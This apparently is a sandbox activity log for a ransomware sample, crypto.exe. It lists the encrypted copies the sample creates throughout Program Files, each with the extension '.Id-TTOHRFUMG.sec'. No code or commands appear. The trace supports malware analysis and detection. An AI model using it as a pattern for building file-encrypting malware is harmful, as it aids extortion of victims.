File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Algiers.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00116_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287020.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00563_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Hardcover.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Danmarkshavn.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\SETLANG.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\EMSMDB32.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libdemux_stl_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_gather_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Vostok.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107290.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00097_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\CALNDR98.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonUp_Off.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jakarta.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0332364.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\Parity.fx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Sort\YEAR.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_snow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wake.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\accessibility.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ENGDIC.DAT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_ring_docked.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\NAMECONTROLPROXY.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Montevideo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00163_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue.css.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\button-highlight.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02073_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14793_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\REMOTES.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access_output\libaccess_output_http_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_autodel_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00525_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00671_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR49F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-crt-process-l1-1-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\back_lrg.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Barbados.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\DigitalInk.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Casual.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\1033\VSTAClientPkgUI.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0188513.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00142_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00058_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPreviewTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\d3d11\libdirect3d11_filters_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Volgograd.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ONBttnOL.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGCAL.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01243_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\gmail.crx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198022.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\pagecurl.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Juneau.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101856.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\BUTTON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\de.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayman.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\deploy\messages_es.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SIGNS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\nl.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0222017.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rss_headline_glow_docked.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+7.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0233665.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME02.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_spellcheck.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\validation.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Paris.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME25.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\15.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0318448.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02756U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_TexturedBlue.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\en-US\WMPDMC.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099180.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15272_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\AdjacencyReport.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_few-showers.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.ja_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\security\java.security.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21398_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME15.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\OutSyncPC.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\IEAWSDC.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\powerpnt.exe.manifest.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\0.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\Microsoft.VisualStudio.Tools.Applications.ComRPCChannel.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ADDINS\MSSPC.ECF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libaudiobargraph_a_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Khartoum.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182898.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185780.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00523_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN105.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\background.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\WSS_DocLib.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\Chatham.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01193_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152610.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01468_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01241_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18208_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSOCF.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-highlight.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libsatip_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SHARING.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\attention.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Resolute.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIconsMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00932_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\1033\OLJRNLR.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.NO.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Novosibirsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086432.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153087.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Santarem.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR36B.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libdcp_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+5.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE05665_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18251_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_bullets.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\OLKFSTUB.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh88.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\Microsoft.Synchronization.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Simferopol.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00121_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR10F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKACCL.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_dot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Malta.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Start End Dates.accft.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Jamaica.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN00965_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107742.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0205582.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME10.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\1033\OLAPPTR.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\MENUS.JS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\activity16v.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\EntityPicker.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHighMask.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_FormsHomePageSlice.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\VIEW.JS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_disabled.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152570.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241019.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01745_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\SHOVEL.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_es.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Style\SIST02.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEWBY.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\tnameserv.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0212299.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00478_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\utilityfunctions.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\rollinghills.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00648_.WMF.Id-TTOHRFUMG.sec	crypto.exe
